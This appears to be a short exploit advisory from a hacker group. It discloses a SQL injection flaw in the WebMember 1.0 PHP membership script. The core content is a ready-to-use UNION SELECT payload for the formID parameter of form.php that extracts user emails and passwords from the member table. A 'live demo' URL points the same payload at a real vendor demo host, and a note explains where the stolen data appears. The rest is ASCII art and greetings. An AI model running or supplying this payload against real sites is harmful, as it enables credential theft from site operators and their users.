================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M S N N N A A K K E S T E A A M M M SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M ===================================================SNAKES TEAM==================================================== WebMember 1.0 (formID) Remote SQL Injection Vulnerability ==============================================:::ALGERIAN HaCkEr:::=============================================== = = = = = = Discovered By: KiM :::ALGERIAN HaCkEr::: = = = = = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = = = = = :::::E-mail : x0@hotmail.es::::::: = = = = = Sript : http://www.phpmembers.com = = http://www.phpmembers.com/download.html = =================================== Snakespc ====================================== [x] Note :You must Sign up...... [x] Exploit: http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user-- [x] Live demo: http://demo.phpmembers.com/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM demo_user-- [x] Note2: The injection's result will be in the link or inside the "Not Found" message the default prefix of the table name is mem =================================================================================================================== Greet'z : His0k4 ( My Love ^^ ) & Super_Cristal & CMOS_CLR17 & EVILWAY & Dr.OrYx & ALL ALGERIAN HACKERZ str0ke.....>>>>.....milw0rm ===================================================================================================================